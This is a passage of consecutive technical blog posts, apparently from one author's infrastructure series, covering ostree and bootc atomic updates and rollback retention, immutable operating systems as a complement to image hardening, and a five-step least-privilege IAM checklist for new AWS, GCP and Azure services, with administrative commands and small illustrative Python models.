bootc switch and bootc upgrade do the same three-step dance as raw ostree: pull the new commit (here, derived from a container image’s layers instead of an RPM-based tree), stage a deployment directory, write the bootloader entry. The difference is entirely in step 1: bootc converts OCI container image layers into an ostree commit instead of building one from package installation directly. Your existing container registry, existing Containerfile conventions, and existing image-signing pipeline all apply unchanged to what is, underneath, a bootable operating system.

Where ostree and bootc Actually Diverge

	Raw ostree (Fedora CoreOS style)	bootc
Image defined as	`rpm-ostree compose` treefile (custom format)	Standard `Containerfile`
Build tooling	ostree/rpm-ostree-specific	Any OCI-compatible builder (`podman`, `buildah`, `docker`)
Registry/distribution	ostree’s own HTTP-based repo protocol, or OSTree-in-OCI	Standard container registry (Quay, Docker Hub, ECR, GHCR)
Deployment mechanism on disk	ostree commits, A/B deployments	Identical — ostree commits, A/B deployments
Rollback command	`rpm-ostree rollback`	`bootc rollback`
Best fit	Teams already fluent in ostree/Fedora tooling	Teams that want OS images to fit their existing container CI/CD

Nothing about atomicity, rollback safety, or the deployment model changes between the two — bootc’s entire value proposition is packaging the same guarantee behind tooling most infrastructure teams already have muscle memory for.

The Part EP01 Didn’t Mention: Rollback Has a Shelf Life

“The previous deployment is always intact for rollback” (EP01’s phrasing) is true, but not indefinitely. Each deployment consumes real disk space — a full OS tree’s worth of objects, though ostree deduplicates identical objects across commits so an incremental update doesn’t cost a second full copy. Two mechanisms limit how far back you can actually roll:

Deployment count limits. Most configurations keep a bounded number of deployments (commonly 2–3). Once you’ve upgraded past that limit, the oldest deployment is pruned — rpm-ostree cleanup or an automatic policy removes it, and its objects become eligible for garbage collection if nothing else references them.

Garbage collection reclaims orphaned objects. ostree prune (or rpm-ostree cleanup -r, which removes the rollback deployment and then cleans up) removes any object in the repository not reachable from a currently-kept deployment or a pinned ref. If you pruned a deployment last week and need to roll back to it today, that commit is gone: not degraded, not slow to restore, simply no longer present.

# See exactly what's kept and what's eligible for cleanup
$ ostree admin status
  fedora-coreos 38.20240210.3.0 (booted)   # current
  fedora-coreos 38.20240115.2.0            # one rollback available

# Pin a deployment explicitly if you need a longer-lived rollback
# target than the default retention policy provides
$ ostree admin pin 1

If your incident-response plan assumes “we can always roll back to last month’s known-good state,” verify that against your actual retention policy — the default is usually one previous deployment, not an archive.
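The interaction between the deployment limit, pinning, and garbage collection can be sketched as a small reachability model. This is a toy illustration rather than ostree's implementation: the `Deployment` class and the `prune_deployments` and `collect_garbage` functions are hypothetical names, and objects are plain strings standing in for content hashes.

```python
from dataclasses import dataclass


@dataclass
class Deployment:
    """Toy stand-in for a deployment: a name plus the object IDs it references."""
    name: str
    objects: frozenset
    pinned: bool = False


def prune_deployments(deployments, keep):
    """Keep the newest `keep` deployments plus anything pinned.

    `deployments` is ordered newest first.
    """
    return [d for i, d in enumerate(deployments) if i < keep or d.pinned]


def collect_garbage(repo_objects, deployments):
    """Return only the objects still reachable from a kept deployment."""
    reachable = set()
    for d in deployments:
        reachable |= d.objects
    return repo_objects & reachable


# Three deployments that share some objects (deduplication).
v3 = Deployment("v3", frozenset({"kernel-6.8", "glibc-2.39", "app-3"}))
v2 = Deployment("v2", frozenset({"kernel-6.8", "glibc-2.39", "app-2"}))
v1 = Deployment("v1", frozenset({"kernel-6.7", "glibc-2.39", "app-1"}))

repo = set(v3.objects | v2.objects | v1.objects)

kept = prune_deployments([v3, v2, v1], keep=2)
repo_after_gc = collect_garbage(repo, kept)

print([d.name for d in kept])
print(sorted(repo - repo_after_gc))  # objects that only v1 referenced
```

Marking `v1` as `pinned=True` before pruning keeps it in the list, so its objects stay reachable and survive collection. That is the behaviour a pin buys, and also why a forgotten pin holds disk space indefinitely.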

Quick Reference

# Inspect the commit graph and current deployments
ostree admin status                      # deployments + which is booted
ostree log <ref>                         # commit history for a branch
ostree show <checksum>                   # inspect a specific commit

# rpm-ostree (Fedora CoreOS / Silverblue)
rpm-ostree status                        # current + staged, same as EP01
rpm-ostree cleanup -r                    # remove rollback deployment + GC

# bootc
bootc status                             # current + staged image
bootc switch <image-ref>                 # move to a different image
bootc upgrade                            # pull updates for the tracked image, stage them
bootc rollback                           # revert to previous deployment

Production Gotchas

“Atomic” doesn’t mean “instant.” Staging a new deployment can take as long as a full OS install — the atomicity guarantee is about the swap being indivisible, not about the whole process being fast. Budget real time for the pull-and-stage phase in maintenance windows.

Deduplication means disk usage doesn’t scale linearly with deployment count, but it isn’t free either. A kernel or major package version bump touches enough objects that “just keep 5 deployments for safety” can use more disk than teams expect. Monitor /ostree/repo size, don’t assume it’s negligible.
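A rough way to reason about this is to count each unique object once, the way a content-addressed store does. The sketch below is illustrative only: the object names and sizes are invented, and `repo_size` and `naive_size` are hypothetical helpers, not ostree commands.

```python
def repo_size(deployments):
    """Total bytes stored when each unique object ID is counted once."""
    unique = {}
    for objects in deployments:
        unique.update(objects)  # same ID means same content, so same size
    return sum(unique.values())


def naive_size(deployments):
    """What the total would be with no deduplication at all."""
    return sum(sum(objects.values()) for objects in deployments)


MB = 1024 * 1024

# Invented sizes, chosen only to make the arithmetic easy to follow.
base = {"glibc": 40 * MB, "systemd": 30 * MB, "kernel-6.7": 120 * MB}
minor = {**base, "app-config-v2": 1 * MB}
major = {"glibc": 40 * MB, "systemd": 30 * MB, "kernel-6.8": 125 * MB}

print(repo_size([base, minor]) // MB, "MB after a small update")
print(repo_size([base, major]) // MB, "MB after a kernel bump")
print(naive_size([base, major]) // MB, "MB with no deduplication")
```

With these made-up numbers the small update adds 1 MB while the kernel bump adds 125 MB, which is the pattern to watch for when deciding how many deployments to retain.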

Pinning a deployment and forgetting about it silently defeats garbage collection. ostree admin pin is the right tool for “I need to guarantee this stays available,” but a pinned deployment never gets reclaimed automatically — audit pins periodically or disk usage grows unbounded.

bootc’s registry dependency is a new failure mode ostree-native updates didn’t have. If your container registry is unreachable, bootc upgrade fails the same way a registry-down event fails an application deployment — factor registry availability into your OS update SLA the same way you already do for app deployments.

Key Takeaways

Every ostree deployment is a content-addressed commit, not a set of files mutated in place — that’s what makes “atomic” a filesystem property instead of a script’s promise
The actual atomicity boundary is a single bootloader entry write; everything before it is invisible to the running system, everything after it takes effect on next boot
bootc uses the identical deployment mechanism, but builds commits from standard Containerfiles and distributes them through standard container registries
Rollback is real but bounded — deployment limits and garbage collection mean “always roll back” has a specific, checkable retention window, not an unlimited one
ostree and bootc differ in build/distribution tooling, not in the safety guarantees the deployment model provides

What’s Next

EP02 covered the mechanism in the abstract. EP03 runs it day-to-day — Fedora CoreOS and Silverblue in practice: what changes about dnf install, package layering, troubleshooting, and rollback when you’re actually living on top of this model instead of reading about it.

Next: EP03 — Fedora CoreOS / Silverblue in Practice


What Is an Immutable OS — and Why Hardening Isn’t Enough

July 7, 2026 by Vamshi Krishna Santhapuri

Reading Time: 7 minutes

Immutable OS Series, Episode 1

TL;DR

An immutable OS is one where the running root filesystem is read-only — the only way to change it is to boot a new, versioned image, never to mutate the one that’s live
Hardening an image proves it’s correct at build time. Immutability is what keeps that proof true after the image boots into production
The mechanism is atomic A/B updates: a new OS image is staged fully, then swapped in as one operation — the system is never caught half-updated
A bad update is one command away from undone: rpm-ostree rollback && systemctl reboot — no reinstall, no image rebuild
bootc, Fedora CoreOS/Silverblue, and Talos Linux are three real implementations of this model, each targeting a different deployment shape
This is not a replacement for Stratum’s hardening pipeline — it’s what keeps a hardened image hardened after it ships

The Big Picture: A Snapshot vs. a Guarantee

TRADITIONAL MUTABLE OS                    IMMUTABLE OS
────────────────────────                  ────────────

Golden image (grade: A)                   Deployment A (active, read-only)
        │ boots into prod                          │
        ▼                                           │  atomic swap
Running root filesystem (read-write)                ▼
        │                                  Deployment B (staged)
        │  SSH fix, config-mgmt run,               │
        │  ad-hoc package install                   │  if boot fails
        ▼                                           ▼
Drifted state — no build artifact         Rollback (one command,
matches what's actually running            no reinstall)

An immutable OS is a system whose root filesystem cannot be changed in place — every change ships as a new, complete, versioned image, and the system swaps to it atomically or not at all. That’s the one-sentence answer, and it’s the reason this series exists: a hardening pipeline can prove an image is correct on the day it’s built, but on a traditional mutable root filesystem, nothing stops that proof from becoming false the day after.

The Gap Stratum’s Grade Doesn’t Cover

Stratum’s series ended with a hardened, graded, pipeline-gated image — POST /api/pipeline/scan fails the build if the grade drops below B, so an unhardened image never reaches production. That solved a real problem: images used to ship broken by default, and now they don’t.

But watch what happens six weeks later. An on-call engineer SSHes into a production node at 2 a.m. to unblock an incident and leaves behind a one-line iptables rule that was never reviewed. A config-management run pushes an unrelated package upgrade because someone’s playbook target list was too broad. A well-meaning teammate installs a debugging tool “just for now” and forgets to remove it. None of this touches the build pipeline. None of it fails a scan, because no scan runs again after the image ships.

Six months later, an auditor asks for evidence that the instance matches its compliance grade. The honest answer is: it did, once, the day it was built. Nobody can say what’s true about it now — the golden image and the running system are two different, unreconciled things.

That’s the gap. Hardening is a build-time guarantee. Immutability is what makes it a runtime guarantee too, because there’s no path left for a change to happen except through the build pipeline that produced the image in the first place.

From Golden Images to Immutable OS: A Short History

Golden images (Stratum’s territory) solved the “every instance starts insecure” problem by baking the correct configuration in at build time — the same idea as infrastructure-as-code applied to an OS baseline. Configuration management tools (Ansible, Chef, Puppet) then tried to solve drift by re-applying the desired state on a schedule, converging the system back toward correctness every run.

Convergence is not the same as prevention. A config-management run that fires every 30 minutes still leaves a window of up to 30 minutes where the system can be anything. And convergence tools can only fix drift they know to look for: an ad-hoc apt install that isn’t in anyone’s playbook just sits there, invisible, until someone happens to notice.

Immutable OS designs remove the window entirely. If the root filesystem is mounted read-only, apt install on a running node doesn’t drift the system — it fails, because there’s nowhere to write the new package. The only way to add that package is to build a new image and boot into it. Prevention replaces convergence.

How Atomic Updates Actually Work

Figure: Golden image vs. immutable OS. Left: a hardened golden image drifts once it’s live on a mutable root filesystem. Right: an immutable OS stages the next image fully before swapping to it atomically, with rollback as a first-class operation.

The core mechanism, used by ostree-based systems (Fedora CoreOS, Silverblue) and bootc alike, is A/B deployment:

Two deployment slots exist on disk at all times — call them A (active) and B (staged). Only one is booted at a time.
An update downloads and assembles the entire new OS image into the inactive slot. This can take minutes. The running system is completely unaffected while it happens — there is no partial state visible to production traffic.
The bootloader entry swaps atomically. This is a single operation, not a sequence of file writes — the system either boots the new deployment on next reboot, or it doesn’t. There’s no window where half the files are new and half are old.
If the new deployment fails to boot or fails a health check, rolling back means booting the previous slot — the old deployment was never deleted, never modified. It’s still exactly what it was before the update.

# Check current and staged deployments
$ rpm-ostree status
State: idle
Deployments:
● ostree://fedora:fedora/38/x86_64/coreos
                   Version: 38.20240210.3.0 (2024-02-10T09:14:22Z)
                   Commit: 8f2a1c...

  ostree://fedora:fedora/38/x86_64/coreos
                   Version: 38.20240115.2.0 (2024-01-15T11:02:03Z)
                   Commit: 3b7e9d...

# Roll back to the previous deployment — no rebuild, no reinstall
$ rpm-ostree rollback
Moving 'ostree://fedora:fedora/38/x86_64/coreos' (38.20240115.2.0) to be first deployment
Run "systemctl reboot" to start a rollback

$ systemctl reboot

The ● marks the currently booted deployment. The second entry never disappeared when the update landed: it’s exactly the OS tree that was running before the update, byte for byte, ready to boot again.
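The stage-then-swap sequence can be sketched with an ordinary directory tree and a symlink. This is an analogy under stated assumptions, not the code ostree or bootc runs: `stage`, `activate`, and `active` are hypothetical helpers, the `current` link stands in for the bootloader entry, and the example assumes a POSIX filesystem where renaming over an existing name is a single step.

```python
import os
import tempfile


def stage(root, name, files):
    """Write a complete new deployment directory; nothing points at it yet."""
    path = os.path.join(root, "deploy", name)
    os.makedirs(path)
    for filename, content in files.items():
        with open(os.path.join(path, filename), "w") as fh:
            fh.write(content)
    return path


def activate(root, name):
    """Atomically repoint `current` at a staged deployment.

    The new symlink is created under a temporary name, then renamed over
    the old one, so a reader sees either the old link or the new one.
    """
    link = os.path.join(root, "current")
    tmp = link + ".tmp"
    if os.path.lexists(tmp):
        os.remove(tmp)
    os.symlink(os.path.join("deploy", name), tmp)
    os.replace(tmp, link)


def active(root):
    """Return the name of the deployment `current` points at."""
    return os.path.basename(os.readlink(os.path.join(root, "current")))


root = tempfile.mkdtemp()
stage(root, "v1", {"os-release": "VERSION=1\n"})
activate(root, "v1")

stage(root, "v2", {"os-release": "VERSION=2\n"})  # v1 stays live while this runs
activate(root, "v2")                               # the single switch point
after_upgrade = active(root)

activate(root, "v1")                               # rollback: v1 was never modified
after_rollback = active(root)
print(after_upgrade, after_rollback)
```

The slow work all happens in `stage`; `activate` is the only step that changes what is live, which is why the rollback at the end costs no more than the upgrade's final step did.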

bootc — covered in depth in EP04 — applies the same A/B model but defines the OS image as an OCI container image, built with a standard Containerfile and pushed to a normal container registry. The deployment mechanism is the same; the packaging format is the one most infrastructure teams already have tooling for.

What You Give Up, and What You Get Back

	Traditional mutable OS	Immutable OS
`apt install`/`dnf install` on a running node	Works, silently drifts the system	Fails — no writable path for it to take
Config-management convergence loop	Required to fight drift	Not needed for the OS tree; only writable paths such as /etc and /var still need managing
“What changed since deployment?”	Shell history, playbook logs, guesswork	`rpm-ostree status` / `bootc status` — exact, versioned answer
Undoing a bad update	Reinstall, restore from backup, or manual repair	One command, one reboot
Auditing compliance months later	Grade describes the image, not the running system	Grade describes the running system, because it can’t have changed
Debugging tools installed ad hoc	Common, invisible in inventory	Requires a new image — visible in version control

The trade-off is real: an immutable OS removes a workflow a lot of engineers rely on — the quick SSH fix. That’s not a bug in the design. It’s the entire point. If the quick fix is impossible, it can’t happen accidentally, and it can’t happen without going through review.

Three Ways This Actually Ships Today

This series covers each of these in depth over the coming episodes — for now, know they exist and roughly where each one fits:

Fedora CoreOS / Silverblue (EP03) — ostree-based, general-purpose immutable Linux. CoreOS targets servers and container hosts; Silverblue targets immutable desktops. Both use rpm-ostree for the deployment model shown above.
bootc (EP04) — an immutable OS image defined as a container image and booted directly, no separate “OS build” toolchain from your application build toolchain. Newer, and increasingly the direction RHEL-family distros are heading.
Talos Linux (EP05) — purpose-built for Kubernetes nodes. No SSH, no shell, no package manager at all — the only interface is an API (talosctl). The most aggressive point on this spectrum: not just read-only, but no interactive access whatsoever.

None of these require you to abandon Stratum. A bootc image or a Fedora CoreOS image can still be built from a hardened, CIS-benchmarked base — the hardening pipeline and the immutability model solve different problems and compose cleanly.

Production Gotchas

Immutability doesn’t mean “no state.” /etc and /var are typically still writable on ostree-based systems (application data, logs, local config overrides have to live somewhere). “Immutable” means the OS binaries and base configuration can’t be mutated in place — read the docs for your specific distro to know exactly what’s writable.

Rollback isn’t instant if you don’t test it first. rpm-ostree rollback works, but if you’ve never practiced it, the first time you run it under incident pressure is the wrong time to discover a health check you forgot to configure. Rehearse rollback the same way you’d rehearse a database failover.

Container image tooling doesn’t automatically make an OS image safe. bootc images are built like container images, which means it’s easy to accidentally treat them like disposable containers instead of long-lived OS deployments — with all the patching and lifecycle discipline that implies.

Not everything you run today has an immutable-OS story yet. Legacy configuration management (Puppet/Chef agents that expect to write to /etc continuously) and some monitoring agents assume a mutable filesystem. Check compatibility before you migrate a fleet.

Quick Reference

# ostree/rpm-ostree (Fedora CoreOS, Silverblue)
rpm-ostree status                  # current + staged deployments
rpm-ostree upgrade                 # stage the next image
rpm-ostree rollback                # revert to the previous deployment
ostree admin status                # lower-level deployment inspection

# bootc
bootc status                       # current + staged image, digest-pinned
bootc upgrade                      # pull and stage the next image
bootc rollback                     # revert to the previous deployment

# Talos Linux (API-only, no shell)
talosctl version                   # node + API version
talosctl get machineconfig         # current applied config
talosctl upgrade --image <ref>     # stage a new node image

Key Takeaways

A hardened image is a build-time guarantee; an immutable OS is what makes that guarantee hold at runtime too
Atomic A/B deployment means the system is never caught half-updated, and the previous deployment is always intact for rollback
Config-management convergence fights drift on a schedule; immutability removes the writable path drift needs to happen at all
rpm-ostree/bootc give you an exact, versioned answer to “what changed” instead of shell history and guesswork
This composes with Stratum’s hardening pipeline — it doesn’t replace it

What’s Next

EP01 established the gap: hardening proves an image correct once, at build time, and a mutable root filesystem gives that proof an expiration date nobody tracks. EP02 goes one level deeper into the mechanism that closes it — exactly how ostree and bootc implement atomic A/B updates under the hood, including how the bootloader is involved and what “atomic” actually guarantees.

Next: EP02 — Atomic OS Updates Explained: How ostree and bootc Actually Work


New Cloud Service IAM Permissions: A Checklist Before You Grant Access

July 6, 2026 by Vamshi Krishna Santhapuri

Reading Time: 7 minutes

← EP12: Zero Trust Access in the Cloud · EP13: New-Service IAM Checklist · All Cloud IAM Episodes →

TL;DR

New cloud service IAM permissions ship on GA day — often before your Terraform provider, internal IaC modules, or team wiki catch up
The fast path is service:* on Resource: * — the tempting unblock, and also how wildcard debt starts (see EP09’s least-privilege audit)
Five-step checklist: find the exact actions, scope the resource, dry-run before granting, attach a guardrail, and put a 30-day review on the calendar
AWS has no single CLI call that lists “every action for a service” — use the Service Authorization Reference plus IAM Access Analyzer’s policy generation from real CloudTrail activity
GCP’s gcloud iam list-testable-permissions returns the exact permissions grantable on a specific resource — scoped to what that resource type actually supports
Azure’s az provider operation show --namespace Microsoft.<Service> lists every operation a resource provider exposes, before you write a single role assignment

The Big Picture

  NEW CLOUD SERVICE SHIPS — THE FIRST GRANT DECIDES THE NEXT YEAR

  Provider ships GA
         │
         ▼
  Team requests access ──────► Tempting shortcut: "service:*" on "*"
         │                      (unblocks today, becomes next year's
         │                       wildcard-debt line item in EP09's audit)
         ▼
  STEP 1 — Find the exact actions the task needs
         │   (Service Authorization Reference · list-testable-permissions ·
         │    provider operation show)
         ▼
  STEP 2 — Scope the resource, not the account
         │   (ARN pattern / resource URI / resource group — never "*")
         ▼
  STEP 3 — Dry-run before granting
         │   (simulate-principal-policy · policy-troubleshoot iam · what-if)
         ▼
  STEP 4 — Attach a guardrail, not just a grant
         │   (permission boundary / SCP · Org Policy · Azure Policy)
         ▼
  STEP 5 — Put a 30-day review on the calendar
         │   (provisional access, not permanent — EP09's audit is the
         │    backstop for whatever step 5 misses)
         ▼
  Access granted: scoped, guarded, and time-boxed

Introduction

New cloud service IAM permissions land the same day a provider ships something new — usually before your Terraform provider, your internal enablement docs, or anyone’s muscle memory has caught up. A team wants to use the new service today, and the fastest way to unblock them is a wildcard: service:* on Resource: *. It works immediately. It also never gets revisited.

I’ve seen this pattern enough times across AWS, GCP, and Azure environments to stop treating it as a one-off mistake and start treating it as a predictable failure mode. Every cloud provider ships new services and new API actions on existing services continuously — thousands of changes a year across the big three. IAM has to keep up with all of it, and nobody’s tooling updates same-day. The gap between “the service exists” and “the least-privilege policy for it exists” is where every wildcard grant in your account was born.

This episode is the checklist I use to close that gap before it becomes EP09’s least-privilege audit problem six months later.

Why This Keeps Happening

Cloud providers version their IAM action sets independently of their service launches. A service can go GA with its full action list, then add new actions for a feature shipped three months later — with no changelog most teams are subscribed to. Preview and beta services are worse: action names occasionally change between preview and GA, which means a policy scoped correctly during the beta can silently stop matching after the rename.

None of this is a documentation failure you can fix by reading more carefully. It’s a structural lag between provider release velocity and your policy review cycle. The fix isn’t reading faster — it’s having a checklist that runs the same way every time a new service shows up in a support ticket.

Step 1: Find the Exact Actions the Task Needs

AWS

AWS doesn’t expose a single CLI call that lists “every action for this service.” The two real sources:

The Service Authorization Reference — the canonical, per-service action/resource/condition-key list. Not a CLI, but the ground truth.
IAM Access Analyzer’s policy generation — build a least-privilege policy from what a role actually called, not from the full service action list:

# Let a trial role use the new service for a short period first, then generate
# a policy scoped to only the actions that were actually invoked.
# startTime is required; the timestamp below is a placeholder for the start
# of the trial window.
aws accessanalyzer start-policy-generation \
  --policy-generation-details principalArn=arn:aws:iam::123456789012:role/new-service-trial-role \
  --cloud-trail-details '{
    "trails": [{"cloudTrailArn": "arn:aws:cloudtrail:us-east-1:123456789012:trail/management-trail", "allRegions": true}],
    "accessRole": "arn:aws:iam::123456789012:role/AccessAnalyzerMonitorRole",
    "startTime": "2026-06-01T00:00:00Z"
  }'

# Poll for the generated policy once the job completes
aws accessanalyzer get-generated-policy --job-id <JOB_ID>

For operators: this generates a policy from observed API calls, not theoretical need. Run the trial role for long enough to exercise every code path the team actually uses — a policy generated from five minutes of testing will be too narrow for production.
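The idea behind generating a policy from observed activity can be sketched in a few lines. This is a simplified model, not what Access Analyzer does internally: the flat event records and the `roleArn` field are hypothetical (real CloudTrail records are nested, and event names do not always map one-to-one onto IAM action names), and `observed_actions` is an illustrative helper.

```python
def observed_actions(events, role_arn):
    """Collect the distinct service:action pairs a given role actually called."""
    actions = set()
    for event in events:
        if event["roleArn"] != role_arn:
            continue
        # "bedrock.amazonaws.com" -> "bedrock"
        service = event["eventSource"].split(".")[0]
        actions.add(f"{service}:{event['eventName']}")
    return sorted(actions)


TRIAL_ROLE = "arn:aws:iam::123456789012:role/new-service-trial-role"
OTHER_ROLE = "arn:aws:iam::123456789012:role/other-role"

# Hypothetical, simplified activity records for illustration only.
events = [
    {"roleArn": TRIAL_ROLE, "eventSource": "bedrock.amazonaws.com", "eventName": "InvokeModel"},
    {"roleArn": TRIAL_ROLE, "eventSource": "bedrock.amazonaws.com", "eventName": "InvokeModel"},
    {"roleArn": TRIAL_ROLE, "eventSource": "bedrock.amazonaws.com", "eventName": "ListFoundationModels"},
    {"roleArn": OTHER_ROLE, "eventSource": "s3.amazonaws.com", "eventName": "ListBuckets"},
]

full_trial = observed_actions(events, TRIAL_ROLE)
short_trial = observed_actions(events[:2], TRIAL_ROLE)  # trial stopped too early
print(full_trial)
print(short_trial)
```

The short trial never saw `ListFoundationModels`, so a policy built from it would deny that call in production. The generated action list is only as complete as the activity that fed it.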

GCP

# Returns the exact permissions that CAN be granted on this specific resource —
# scoped to what that resource type supports, not the whole service
gcloud iam list-testable-permissions \
  //aiplatform.googleapis.com/projects/my-project/locations/us-central1

Reading the output: each returned permission is one your team might plausibly need — GCP won’t list permissions that don’t apply to this resource type. Cross-reference against the task at hand and grant only the subset actually required.

Azure

# Lists every operation (permission) a resource provider namespace exposes.
# The command returns one provider object; operations are nested per resource type.
az provider operation show \
  --namespace Microsoft.CognitiveServices \
  --query "resourceTypes[].operations[].{Operation:name, Description:description}" \
  -o table

This is the full menu for the namespace — most tasks need a handful of these operations, not all of them. Use it to find the exact operation string for a custom role definition rather than reaching for a built-in Contributor-level role.

Step 2: Scope the Resource, Not the Account

Finding the right action is half the job. The other half is refusing "Resource": "*".

// Bad: every Bedrock action, on every resource, in every region, forever
{
  "Effect": "Allow",
  "Action": "bedrock:*",
  "Resource": "*"
}

// Better — scoped to the specific model family the team asked for
{
  "Effect": "Allow",
  "Action": ["bedrock:InvokeModel"],
  "Resource": "arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude*"
}

The same discipline applies in GCP (bind the role to the specific project or resource, not the organization) and Azure (scope the role assignment to the resource group, not the subscription). A new service is the easiest moment to get this right — there’s no existing wildcard grant to “just extend.”
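A check like this is easy to automate in review. The sketch below flags wildcard actions and resources in an AWS-style policy document; `wildcard_findings` is a hypothetical helper, and it deliberately ignores conditions, `NotAction`, and partial wildcards, so treat it as a starting point rather than a complete linter.

```python
def _as_list(value):
    """IAM allows a single string or a list; normalise to a list."""
    return [value] if isinstance(value, str) else list(value)


def wildcard_findings(policy):
    """Return (statement_index, field, value) for each wildcard in Allow statements."""
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    findings = []
    for index, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow":
            continue
        for action in _as_list(stmt.get("Action", [])):
            if action == "*" or action.endswith(":*"):
                findings.append((index, "action", action))
        for resource in _as_list(stmt.get("Resource", [])):
            if resource == "*":
                findings.append((index, "resource", resource))
    return findings


bad = {"Statement": [{"Effect": "Allow", "Action": "bedrock:*", "Resource": "*"}]}
better = {
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["bedrock:InvokeModel"],
            "Resource": "arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude*",
        }
    ]
}

print(wildcard_findings(bad))
print(wildcard_findings(better))
```

The scoped policy still contains a trailing `*` in the model ARN, and the check lets it through on purpose: a wildcard inside a specific ARN prefix is a scoping decision, while a bare `*` is the absence of one.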

Step 3: Dry-Run Before You Grant

Test the policy against the real action before it’s live.

# AWS: simulate whether a principal's policy allows a specific action on a specific resource
aws iam simulate-principal-policy \
  --policy-source-arn arn:aws:iam::123456789012:role/new-service-role \
  --action-names bedrock:InvokeModel \
  --resource-arns arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-v2

# GCP: Policy Troubleshooter — does this principal have this permission on this resource, and why (or why not)?
gcloud policy-troubleshoot iam \
  //aiplatform.googleapis.com/projects/my-project/locations/us-central1 \
  --principal-email=svc-new-service@my-project.iam.gserviceaccount.com \
  --permission=aiplatform.endpoints.predict

# Azure: preview what an IaC deployment (including role assignments) will change before applying it
az deployment group what-if \
  --resource-group rg-new-service \
  --template-file role-assignment.bicep

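None of these grant access. Each tells you, before the change reaches production, whether the policy you wrote actually does what you think it does. The AWS and GCP commands evaluate policies already attached or bound to the principal, so point them at a trial role or a test binding; what-if previews the deployment itself.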
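To build intuition for what a simulator is checking, here is a heavily simplified evaluator. It is not the provider's evaluation logic: it models only `Effect`, `Action`, and `Resource` with glob matching, and ignores conditions, boundaries, SCPs, and resource policies. `is_allowed` is a hypothetical helper.

```python
from fnmatch import fnmatchcase


def _as_list(value):
    return [value] if isinstance(value, str) else list(value)


def is_allowed(statements, action, resource):
    """Default deny; an explicit Deny beats any Allow."""
    allowed = False
    for stmt in statements:
        action_match = any(
            fnmatchcase(action.lower(), pattern.lower())
            for pattern in _as_list(stmt["Action"])
        )
        resource_match = any(
            fnmatchcase(resource, pattern) for pattern in _as_list(stmt["Resource"])
        )
        if not (action_match and resource_match):
            continue
        if stmt["Effect"] == "Deny":
            return False
        allowed = True
    return allowed


statements = [
    {
        "Effect": "Allow",
        "Action": ["bedrock:InvokeModel"],
        "Resource": "arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude*",
    }
]

claude = "arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-v2"
titan = "arn:aws:bedrock:us-east-1::foundation-model/amazon.titan-text-express-v1"

print(is_allowed(statements, "bedrock:InvokeModel", claude))
print(is_allowed(statements, "bedrock:InvokeModel", titan))
print(is_allowed(statements, "bedrock:DeleteCustomModel", claude))
```

The value of a dry run is in the negative cases: confirming that the out-of-scope model and the unrelated action are refused matters as much as confirming the intended call succeeds.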

Step 4: Attach a Guardrail, Not Just a Grant

A grant without a guardrail is one typo away from being an account-wide wildcard. Pair every new-service grant with a boundary that survives the next person copy-pasting the policy:

AWS — a permission boundary on the role, or an SCP restricting the new service to specific OUs until it’s been reviewed
GCP — an Org Policy constraint limiting resource locations or restricting which services can be enabled in the first place
Azure — an Azure Policy assignment enforcing an allowed-services list at the subscription or management group level

The guardrail is what keeps “we scoped it correctly on day one” true after the policy gets copied into three other roles by someone who wasn’t in this conversation.
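The reason a guardrail survives a widened grant is that the effective permission is the intersection of the two. A minimal sketch, assuming action-only matching and hypothetical pattern lists (real boundaries and SCPs also evaluate resources and conditions):

```python
from fnmatch import fnmatchcase


def matches(action, patterns):
    """True if the action matches any glob pattern, case-insensitively."""
    return any(fnmatchcase(action.lower(), p.lower()) for p in patterns)


def effective(action, grant_patterns, boundary_patterns):
    """An action is usable only if both the grant and the boundary allow it."""
    return matches(action, grant_patterns) and matches(action, boundary_patterns)


# Hypothetical boundary set at review time.
boundary = ["bedrock:InvokeModel", "bedrock:List*"]

scoped_grant = ["bedrock:InvokeModel"]
copy_pasted_grant = ["bedrock:*"]  # someone widened the grant later

print(effective("bedrock:InvokeModel", scoped_grant, boundary))
print(effective("bedrock:DeleteCustomModel", copy_pasted_grant, boundary))
```

Even after the grant is widened to `bedrock:*`, the destructive action stays unusable because the boundary never listed it.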

Step 5: Put a 30-Day Review on the Calendar

Treat every new-service grant as provisional, not permanent. A calendar reminder — not a ticket that can sit in a backlog — to check actual usage against granted permissions 30 days out.

This is the same discipline EP09’s least-privilege audit runs at the account level, applied at the moment of grant instead of six months later. Step 5 is what catches the case where the team’s actual usage turned out narrower than the trial period suggested — or wider, because the trial period didn’t exercise every path.
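The review itself reduces to a set comparison plus a date. The sketch below assumes you already have the granted action list and a list of actions observed in use; `review_date` and `review` are hypothetical helpers, and the sample data is invented.

```python
from datetime import date, timedelta


def review_date(granted_on, days=30):
    """The day the provisional grant should be re-examined."""
    return granted_on + timedelta(days=days)


def review(granted, used):
    """Compare what was granted with what was actually exercised."""
    granted, used = set(granted), set(used)
    return {
        "unused": sorted(granted - used),    # candidates for removal
        "ungranted": sorted(used - granted), # attempted but never granted
    }


granted = ["bedrock:InvokeModel", "bedrock:ListFoundationModels", "bedrock:GetFoundationModel"]
used = ["bedrock:InvokeModel", "bedrock:InvokeModelWithResponseStream"]

due = review_date(date(2026, 7, 6))
result = review(granted, used)
print(due.isoformat())
print(result)
```

Both halves of the result matter: `unused` is where the grant can be narrowed, and `ungranted` is the signal that the trial period missed a code path.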

Production Gotchas

Mistake	Impact	Fix
Granting console-wide access “temporarily” while waiting for Terraform provider support	Temporary access outlives the wait — nobody revokes it once the provider resource ships	Time-box the console grant explicitly; automate its removal, don’t rely on memory
Scoping a policy to a preview/beta action name	Silent breakage (or worse, silent continued access via an old wildcard) when the action renames at GA	Re-verify the action name against the Service Authorization Reference at GA, not just at preview
Assuming a new service reuses an existing condition key	Policy conditions that “should” restrict access silently don’t apply, because the new service doesn’t support that key	Check the service’s supported condition keys before reusing an existing policy pattern
Trial period too short for Access Analyzer’s policy generation	Generated policy is too narrow; production breaks on day one under real load	Run the trial long enough to exercise every code path, including error and retry paths

Quick Reference

Task	AWS	GCP	Azure
Discover exact actions	Service Authorization Reference + `accessanalyzer start-policy-generation`	`gcloud iam list-testable-permissions <resource>`	`az provider operation show --namespace <Provider>`
